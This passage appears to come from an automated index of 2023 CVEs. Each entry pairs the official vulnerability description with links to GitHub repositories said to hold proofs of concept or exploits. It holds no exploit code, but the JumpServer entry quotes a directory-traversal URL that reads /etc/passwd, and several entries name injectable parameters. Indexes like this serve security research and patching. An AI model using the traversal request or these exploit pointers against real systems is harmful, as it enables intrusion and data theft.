A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function.
- [sealldeveloper/CVE-2023-40933-PoC](https://github.com/sealldeveloper/CVE-2023-40933-PoC)
### CVE-2023-40989 (2023-09-22)
SQL injection vulnerbility in jeecgboot jeecg-boot v 3.0, 3.5.3 that allows a remote attacker to execute arbitrary code via a crafted request to the report/jeecgboot/jmreport/queryFieldBySql component.
- [Zone1-Z/CVE-2023-40989](https://github.com/Zone1-Z/CVE-2023-40989)
### CVE-2023-41064 (2023-09-07)
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 16.6.1 and iPadOS 16.6.1, macOS Monterey 12.6.9, macOS Ventura 13.5.2, iOS 15.7.9 and iPadOS 15.7.9, macOS Big Sur 11.7.10. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
- [MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064](https://github.com/MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064)
- [MrR0b0t19/CVE-2023-41064](https://github.com/MrR0b0t19/CVE-2023-41064)
- [sarsaeroth/CVE-2023-41064-POC](https://github.com/sarsaeroth/CVE-2023-41064-POC)
### CVE-2023-41080 (2023-08-25)
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.\n\nThe vulnerability is limited to the ROOT (default) web application.
- [shiomiyan/CVE-2023-41080](https://github.com/shiomiyan/CVE-2023-41080)
### CVE-2023-41265 (2023-08-29)
An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.
- [praetorian-inc/zeroqlik-detect](https://github.com/praetorian-inc/zeroqlik-detect)
### CVE-2023-41362 (2023-08-29)
MyBB before 1.8.36 allows Code Injection by users with certain high privileges. Templates in Admin CP intentionally use eval, and there was some validation of the input to eval, but type juggling interfered with this when using PCRE within PHP.
- [SorceryIE/CVE-2023-41362_MyBB_ACP_RCE](https://github.com/SorceryIE/CVE-2023-41362_MyBB_ACP_RCE)
### CVE-2023-41425 (2023-11-07)
Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.
- [prodigiousMind/CVE-2023-41425](https://github.com/prodigiousMind/CVE-2023-41425)
- [charlesgargasson/CVE-2023-41425](https://github.com/charlesgargasson/CVE-2023-41425)
- [insomnia-jacob/CVE-2023-41425](https://github.com/insomnia-jacob/CVE-2023-41425)
- [tiyeume25112004/CVE-2023-41425](https://github.com/tiyeume25112004/CVE-2023-41425)
- [thefizzyfish/CVE-2023-41425-wonderCMS_RCE](https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE)
- [Raffli-Dev/CVE-2023-41425](https://github.com/Raffli-Dev/CVE-2023-41425)
- [duck-sec/CVE-2023-41425](https://github.com/duck-sec/CVE-2023-41425)
- [TanveerS1ngh/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425](https://github.com/TanveerS1ngh/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425)
- [h3athen/CVE-2023-41425](https://github.com/h3athen/CVE-2023-41425)
### CVE-2023-41436 (2023-09-15)
Cross Site Scripting vulnerability in CSZCMS v.1.3.0 allows a local attacker to execute arbitrary code via a crafted script to the Additional Meta Tag parameter in the Pages Content Menu component.
- [sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content)
### CVE-2023-41474 (2024-01-25)
Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component.
- [JBalanza/CVE-2023-41474](https://github.com/JBalanza/CVE-2023-41474)
### CVE-2023-41507 (2023-09-05)
Super Store Finder v3.6 was discovered to contain multiple SQL injection vulnerabilities in the store locator component via the products, distance, lat, and lng parameters.
- [redblueteam/CVE-2023-41507](https://github.com/redblueteam/CVE-2023-41507)
### CVE-2023-41508 (2023-09-05)
A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel.
- [redblueteam/CVE-2023-41508](https://github.com/redblueteam/CVE-2023-41508)
### CVE-2023-41533
- [Sh33talUmath/CVE-2023-41533](https://github.com/Sh33talUmath/CVE-2023-41533)
### CVE-2023-41534
- [Sh33talUmath/CVE-2023-41534](https://github.com/Sh33talUmath/CVE-2023-41534)
### CVE-2023-41535
- [Sh33talUmath/CVE-2023-41535](https://github.com/Sh33talUmath/CVE-2023-41535)
### CVE-2023-41564 (2023-09-08)
An arbitrary file upload vulnerability in the Upload Asset function of Cockpit CMS v2.6.3 allows attackers to execute arbitrary code via uploading a crafted .shtml file.
- [sota70/cve-2023-41564-research](https://github.com/sota70/cve-2023-41564-research)
### CVE-2023-41575 (2023-09-08)
Multiple stored cross-site scripting (XSS) vulnerabilities in /bbdms/sign-up.php of Blood Bank & Donor Management v2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Full Name, Message, or Address parameters.
- [soundarkutty/Stored-xss](https://github.com/soundarkutty/Stored-xss)
### CVE-2023-41592 (2023-09-14)
Froala Editor v4.0.1 to v4.1.1 was discovered to contain a cross-site scripting (XSS) vulnerability.
- [miguelc49/CVE-2023-41592-2](https://github.com/miguelc49/CVE-2023-41592-2)
- [miguelc49/CVE-2023-41592-1](https://github.com/miguelc49/CVE-2023-41592-1)
- [miguelc49/CVE-2023-41592-3](https://github.com/miguelc49/CVE-2023-41592-3)
### CVE-2023-41593 (2023-09-11)
Multiple cross-site scripting (XSS) vulnerabilities in Dairy Farm Shop Management System Using PHP and MySQL v1.1 allow attackers to execute arbitrary web scripts and HTML via a crafted payload injected into the Category and Category Field parameters.
- [MATRIXDEVIL/CVE](https://github.com/MATRIXDEVIL/CVE)
### CVE-2023-41613 (2023-12-04)
EzViz Studio v2.2.0 is vulnerable to DLL hijacking.
- [Eafz/cve-2023-41613](https://github.com/Eafz/cve-2023-41613)
### CVE-2023-41623 (2023-12-12)
Emlog version pro2.1.14 was discovered to contain a SQL injection vulnerability via the uid parameter at /admin/media.php.
- [GhostBalladw/wuhaozhe-s-CVE](https://github.com/GhostBalladw/wuhaozhe-s-CVE)
### CVE-2023-41646 (2023-09-07)
Buttercup v2.20.3 allows attackers to obtain the hash of the master password for the password manager via accessing the file /vaults.json/
- [tristao-marinho/CVE-2023-41646](https://github.com/tristao-marinho/CVE-2023-41646)
### CVE-2023-41717 (2023-08-31)
Inappropriate file type control in Zscaler Proxy versions 3.6.1.25 and prior allows local attackers to bypass file download/upload restrictions.
- [federella/CVE-2023-41717](https://github.com/federella/CVE-2023-41717)
### CVE-2023-41772 (2023-10-10)
Win32k Elevation of Privilege Vulnerability
- [R41N3RZUF477/CVE-2023-41772](https://github.com/R41N3RZUF477/CVE-2023-41772)
### CVE-2023-41892 (2023-09-13)
Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
- [zaenhaxor/CVE-2023-41892](https://github.com/zaenhaxor/CVE-2023-41892)
- [0xfalafel/CraftCMS_CVE-2023-41892](https://github.com/0xfalafel/CraftCMS_CVE-2023-41892)
- [diegaccio/Craft-CMS-Exploit](https://github.com/diegaccio/Craft-CMS-Exploit)
- [acesoyeo/CVE-2023-41892](https://github.com/acesoyeo/CVE-2023-41892)
- [CERTologists/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892](https://github.com/CERTologists/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892)
### CVE-2023-41991 (2023-09-21)
A certificate validation issue was addressed. This issue is fixed in macOS Ventura 13.6, iOS 16.7 and iPadOS 16.7. A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.
- [Zenyith/CVE-2023-41991](https://github.com/Zenyith/CVE-2023-41991)
### CVE-2023-41993 (2023-09-21)
The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.
- [po6ix/POC-for-CVE-2023-41993](https://github.com/po6ix/POC-for-CVE-2023-41993)
- [hrtowii/cve-2023-41993-test](https://github.com/hrtowii/cve-2023-41993-test)
- [0x06060606/CVE-2023-41993](https://github.com/0x06060606/CVE-2023-41993)
- [Mangaia/cve-test](https://github.com/Mangaia/cve-test)
- [J3Ss0u/CVE-2023-41993](https://github.com/J3Ss0u/CVE-2023-41993)
### CVE-2023-42115 (2024-05-03)
Exim AUTH Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of a buffer. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-17434.
- [kirinse/cve-2023-42115](https://github.com/kirinse/cve-2023-42115)
### CVE-2023-42222 (2023-09-28)
WebCatalog before 49.0 is vulnerable to Incorrect Access Control. WebCatalog calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances.
- [itssixtyn3in/CVE-2023-42222](https://github.com/itssixtyn3in/CVE-2023-42222)
### CVE-2023-42283 (2023-11-07)
Blind SQL injection in api_id parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.
- [andreysanyuk/CVE-2023-42283](https://github.com/andreysanyuk/CVE-2023-42283)
### CVE-2023-42284 (2023-11-07)
Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.
- [andreysanyuk/CVE-2023-42284](https://github.com/andreysanyuk/CVE-2023-42284)
### CVE-2023-42326 (2023-11-14)
An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.
- [bl4ckarch/pf-pwnme](https://github.com/bl4ckarch/pf-pwnme)
- [Farzan-Kh/CVE-2023-42326](https://github.com/Farzan-Kh/CVE-2023-42326)
### CVE-2023-42362 (2023-09-14)
An arbitrary file upload vulnerability in Teller Web App v.4.4.0 allows a remote attacker to execute arbitrary commands and obtain sensitive information via uploading a crafted file.
- [Mr-n0b3dy/CVE-2023-42362](https://github.com/Mr-n0b3dy/CVE-2023-42362)
### CVE-2023-42413
- [chenghao-hao/cve-2023-42413](https://github.com/chenghao-hao/cve-2023-42413)
### CVE-2023-42426 (2023-09-25)
Cross-site scripting (XSS) vulnerability in Froala Froala Editor v.4.1.1 allows remote attackers to execute arbitrary code via the 'Insert link' parameter in the 'Insert Image' component.
- [b0marek/CVE-2023-42426](https://github.com/b0marek/CVE-2023-42426)
### CVE-2023-42442 (2023-09-15)
JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n
- [HolyGu/CVE-2023-42442](https://github.com/HolyGu/CVE-2023-42442)
- [tarihub/blackjump](https://github.com/tarihub/blackjump)
- [C1ph3rX13/CVE-2023-42442](https://github.com/C1ph3rX13/CVE-2023-42442)
### CVE-2023-42468 (2023-09-13)
The com.cutestudio.colordialer application through 2.1.8-2 for Android allows a remote attacker to initiate phone calls without user consent, because of improper export of the com.cutestudio.dialer.activities.DialerActivity component. A third-party application (without any permissions) can craft an intent targeting com.cutestudio.dialer.activities.DialerActivity via the android.intent.action.CALL action in conjunction with a tel: URI, thereby placing a phone call.
- [actuator/com.cutestudio.colordialer](https://github.com/actuator/com.cutestudio.colordialer)
### CVE-2023-42469 (2023-09-13)
The com.full.dialer.top.secure.encrypted application through 1.0.1 for Android enables any installed application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.full.dialer.top.secure.encrypted.activities.DialerActivity component.
- [actuator/com.full.dialer.top.secure.encrypted](https://github.com/actuator/com.full.dialer.top.secure.encrypted)
### CVE-2023-42470 (2023-09-11)
The Imou Life com.mm.android.smartlifeiot application through 6.8.0 for Android allows Remote Code Execution via a crafted intent to an exported component. This relates to the com.mm.android.easy4ip.MainActivity activity. JavaScript execution is enabled in the WebView, and direct web content loading occurs.
- [actuator/imou](https://github.com/actuator/imou)
### CVE-2023-42471 (2023-09-11)
The wave.ai.browser application through 1.0.35 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. It contains a manifest entry that exports the wave.ai.browser.ui.splash.SplashScreen activity. This activity uses a WebView component to display web content and doesn't adequately validate or sanitize the URI or any extra data passed in the intent by a third party application (with no permissions).
- [actuator/wave.ai.browser](https://github.com/actuator/wave.ai.browser)
### CVE-2023-42789 (2024-03-12)
A out-of-bounds write in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13 allows attacker to execute unauthorized code or commands via specially crafted HTTP requests.
- [jhonnybonny/CVE-2023-42789](https://github.com/jhonnybonny/CVE-2023-42789)
### CVE-2023-42793 (2023-09-19)
In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
- [H454NSec/CVE-2023-42793](https://github.com/H454NSec/CVE-2023-42793)
- [whoamins/CVE-2023-42793](https://github.com/whoamins/CVE-2023-42793)
- [Zenmovie/CVE-2023-42793](https://github.com/Zenmovie/CVE-2023-42793)
- [johnossawy/CVE-2023-42793_POC](https://github.com/johnossawy/CVE-2023-42793_POC)
- [StanleyJobsonAU/GhostTown](https://github.com/StanleyJobsonAU/GhostTown)
- [hotplugin0x01/CVE-2023-42793](https://github.com/hotplugin0x01/CVE-2023-42793)
- [Zyad-Elsayed/CVE-2023-42793](https://github.com/Zyad-Elsayed/CVE-2023-42793)
- [junnythemarksman/CVE-2023-42793](https://github.com/junnythemarksman/CVE-2023-42793)
- [HusenjanDev/CVE-2023-42793](https://github.com/HusenjanDev/CVE-2023-42793)
- [FlojBoj/CVE-2023-42793](https://github.com/FlojBoj/CVE-2023-42793)
- [SwiftSecur/teamcity-exploit-cve-2023-42793](https://github.com/SwiftSecur/teamcity-exploit-cve-2023-42793)
### CVE-2023-42819 (2023-09-26)
JumpServer is an open source bastion host. Logged-in users can access and modify the contents of any file on the system. A user can use the 'Job-Template' menu and create a playbook named 'test'. Get the playbook id from the detail page, like 'e0adabef-c38f-492d-bd92-832bacc3df5f'. An attacker can exploit the directory traversal flaw using the provided URL to access and retrieve the contents of the file. `https://jumpserver-ip/api/v1/ops/playbook/e0adabef-c38f-492d-bd92-832bacc3df5f/file/?key=../../../../../../../etc/passwd` a similar method to modify the file content is also present. This issue has been addressed in version 3.6.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n
- [C1ph3rX13/CVE-2023-42819](https://github.com/C1ph3rX13/CVE-2023-42819)
### CVE-2023-42820 (2023-09-26)
JumpServer is an open source bastion host. This vulnerability is due to exposing the random number seed to the API, potentially allowing the randomly generated verification codes to be replayed, which could lead to password resets. If MFA is enabled users are not affect. Users not using local authentication are also not affected. Users are advised to upgrade to either version 2.28.19 or to 3.6.5. There are no known workarounds or this issue.
- [C1ph3rX13/CVE-2023-42820](https://github.com/C1ph3rX13/CVE-2023-42820)
- [Startr4ck/cve-2023-42820](https://github.com/Startr4ck/cve-2023-42820)
### CVE-2023-42860 (2024-02-21)
A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to modify protected parts of the file system.
- [Trigii/CVE-2023-42860](https://github.com/Trigii/CVE-2023-42860)
### CVE-2023-42931 (2024-03-28)
The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. A process may gain admin privileges without proper authentication.
- [d0rb/CVE-2023-42931](https://github.com/d0rb/CVE-2023-42931)
### CVE-2023-43040 (2024-05-13)
IBM Spectrum Fusion HCI 2.5.2 through 2.7.2 could allow an attacker to perform unauthorized actions in RGW for Ceph due to improper bucket access. IBM X-Force ID: 266807.
- [riza/CVE-2023-43040](https://github.com/riza/CVE-2023-43040)
### CVE-2023-43115 (2023-09-18)
In Artifex Ghostscript through 10.01.2, gdevijs.c in GhostPDL can lead to remote code execution via crafted PostScript documents because they can switch to the IJS device, or change the IjsServer parameter, after SAFER has been activated. NOTE: it is a documented risk that the IJS server can be specified on a gs command line (the IJS device inherently must execute a command to start the IJS server).
- [jostaub/ghostscript-CVE-2023-43115](https://github.com/jostaub/ghostscript-CVE-2023-43115)
### CVE-2023-43144 (2023-09-22)
Projectworldsl Assets-management-system-in-php 1.0 is vulnerable to SQL Injection via the "id" parameter in delete.php.
- [Pegasus0xx/CVE-2023-43144](https://github.com/Pegasus0xx/CVE-2023-43144)
### CVE-2023-43147 (2023-10-12)
PHPJabbers Limo Booking Software 1.0 is vulnerable to Cross Site Request Forgery (CSRF) to add an admin user via the Add Users Function, aka an index.php?controller=pjAdminUsers&action=pjActionCreate URI.
- [MinoTauro2020/CVE-2023-43147](https://github.com/MinoTauro2020/CVE-2023-43147)
### CVE-2023-43148 (2023-10-12)
SPA-Cart 1.9.0.3 has a Cross Site Request Forgery (CSRF) vulnerability that allows a remote attacker to delete all accounts.
- [MinoTauro2020/CVE-2023-43148](https://github.com/MinoTauro2020/CVE-2023-43148)
### CVE-2023-43149 (2023-10-12)
SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status.
- [MinoTauro2020/CVE-2023-43149](https://github.com/MinoTauro2020/CVE-2023-43149)
### CVE-2023-43154 (2023-09-26)
In Macrob7 Macs Framework Content Management System (CMS) 1.1.4f, loose comparison in "isValidLogin()" function during login attempt results in PHP type confusion vulnerability that leads to authentication bypass and takeover of the administrator account.
- [ally-petitt/CVE-2023-43154-PoC](https://github.com/ally-petitt/CVE-2023-43154-PoC)
### CVE-2023-43177 (2023-11-17)
CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
- [the-emmons/CVE-2023-43177](https://github.com/the-emmons/CVE-2023-43177)
### CVE-2023-43208 (2023-10-26)
NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679.
- [K3ysTr0K3R/CVE-2023-43208-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT)
- [jakabakos/CVE-2023-43208-mirth-connect-rce-poc](https://github.com/jakabakos/CVE-2023-43208-mirth-connect-rce-poc)
- [J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT](https://github.com/J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT)
### CVE-2023-43261 (2023-10-04)
An information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 allows attackers to access sensitive router components.
- [win3zz/CVE-2023-43261](https://github.com/win3zz/CVE-2023-43261)
### CVE-2023-43263 (2023-09-26)
A Cross-site scripting (XSS) vulnerability in Froala Editor v.4.1.1 allows attackers to execute arbitrary code via the Markdown component.
- [b0marek/CVE-2023-43263](https://github.com/b0marek/CVE-2023-43263)
### CVE-2023-43284 (2023-10-05)
D-Link Wireless MU-MIMO Gigabit AC1200 Router DIR-846 100A53DBR-Retail devices allow an authenticated remote attacker to execute arbitrary code via an unspecified manipulation of the QoS POST parameter.
- [MateusTesser/CVE-2023-43284](https://github.com/MateusTesser/CVE-2023-43284)
### CVE-2023-43317 (2024-01-24)
An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component.
- [amjadali-110/CVE-2023-43317](https://github.com/amjadali-110/CVE-2023-43317)
### CVE-2023-43318 (2024-03-05)
TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 allows attackers to escalate privileges via modification of the 'tid' and 'usrlvl' values in GET requests.
- [str2ver/CVE-2023-43318](https://github.com/str2ver/CVE-2023-43318)
### CVE-2023-43323 (2023-09-28)
mooSocial 3.1.8 is vulnerable to external service interaction on post function. When executed, the server sends a HTTP and DNS request to external server. The Parameters effected are multiple - messageText, data[wall_photo], data[userShareVideo] and data[userShareLink].
- [ahrixia/CVE-2023-43323](https://github.com/ahrixia/CVE-2023-43323)
### CVE-2023-43325 (2023-09-25)
A reflected cross-site scripting (XSS) vulnerability in the data[redirect_url] parameter of mooSocial v3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL.
- [ahrixia/CVE-2023-43325](https://github.com/ahrixia/CVE-2023-43325)
### CVE-2023-43326 (2023-09-25)
A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL.
- [ahrixia/CVE-2023-43326](https://github.com/ahrixia/CVE-2023-43326)
### CVE-2023-43339 (2023-09-25)
Cross-Site Scripting (XSS) vulnerability in cmsmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload injected into the Database Name, DataBase User or Database Port components.
- [sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation)
### CVE-2023-43340 (2023-10-19)
Cross-site scripting (XSS) vulnerability in evolution v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected into the cmsadmin, cmsadminemail, cmspassword and cmspasswordconfim parameters
- [sromanhu/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options](https://github.com/sromanhu/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options)
### CVE-2023-43341 (2023-10-19)
Cross-site scripting (XSS) vulnerability in evolution evo v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected uid parameter.
- [sromanhu/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-](https://github.com/sromanhu/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-)
### CVE-2023-43342 (2023-10-19)
Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Languages Menu component.
- [sromanhu/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend](https://github.com/sromanhu/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend)
### CVE-2023-43343 (2023-10-05)
Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Files - Description parameter in the Pages Menu component.
- [sromanhu/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files](https://github.com/sromanhu/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files)
### CVE-2023-43344 (2023-10-19)
Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the SEO - Meta description parameter in the Pages Menu component.
- [sromanhu/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description](https://github.com/sromanhu/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description)
### CVE-2023-43345 (2023-10-19)
Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Content - Name parameter in the Pages Menu component.
- [sromanhu/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content)
### CVE-2023-43346 (2023-10-20)
Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Backend - Dashboard parameter in the Languages Menu component.
- [sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend](https://github.com/sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend)
### CVE-2023-43352 (2023-10-26)
An issue in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload to the Content Manager Menu component.
- [sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content](https://github.com/sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content)
### CVE-2023-43353 (2023-10-20)
Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the extra parameter in the news menu component.
- [sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra](https://github.com/sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra)
### CVE-2023-43354 (2023-10-20)
Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profiles parameter in the Extensions -MicroTiny WYSIWYG editor component.
- [sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension](https://github.com/sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension)
### CVE-2023-43355 (2023-10-20)
Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the password and password again parameters in the My Preferences - Add user component.
- [sromanhu/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user](https://github.com/sromanhu/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user)
### CVE-2023-43356 (2023-10-20)
Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata parameter in the Global Settings Menu component.
- [sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings](https://github.com/sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings)
### CVE-2023-43357 (2023-10-20)
Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the Manage Shortcuts component.
- [sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut](https://github.com/sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut)
### CVE-2023-43358 (2023-10-23)
Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the News Menu component.
- [sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News](https://github.com/sromanhu/CVE-2023-43358-CMSmadesimple-Stored-XSS---News)
### CVE-2023-43359 (2023-10-19)
Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Page Specific Metadata and Smarty data parameters in the Content Manager Menu component.
- [sromanhu/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager](https://github.com/sromanhu/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager)
### CVE-2023-43360 (2023-10-24)
Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Top Directory parameter in the File Picker Menu component.
- [sromanhu/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension](https://github.com/sromanhu/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension)
### CVE-2023-43364 (2023-12-12)
main.py in Searchor before 2.4.2 uses eval on CLI input, which may cause unexpected code execution.
- [libertycityhacker/CVE-2023-43364-Exploit-CVE](https://github.com/libertycityhacker/CVE-2023-43364-Exploit-CVE)
### CVE-2023-43481 (2023-12-27)
An issue in Shenzhen TCL Browser TV Web BrowseHere (aka com.tcl.browser) 6.65.022_dab24cc6_231221_gp allows a remote attacker to execute arbitrary JavaScript code via the com.tcl.browser.portal.browse.activity.BrowsePageActivity component.
- [actuator/com.tcl.browser](https://github.com/actuator/com.tcl.browser)
### CVE-2023-43482 (2024-02-06)
A command execution vulnerability exists in the guest resource functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
- [Mr-xn/CVE-2023-43482](https://github.com/Mr-xn/CVE-2023-43482)
### CVE-2023-43494 (2023-09-20)
Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.
- [mqxmm/CVE-2023-43494](https://github.com/mqxmm/CVE-2023-43494)
### CVE-2023-43622 (2023-10-23)
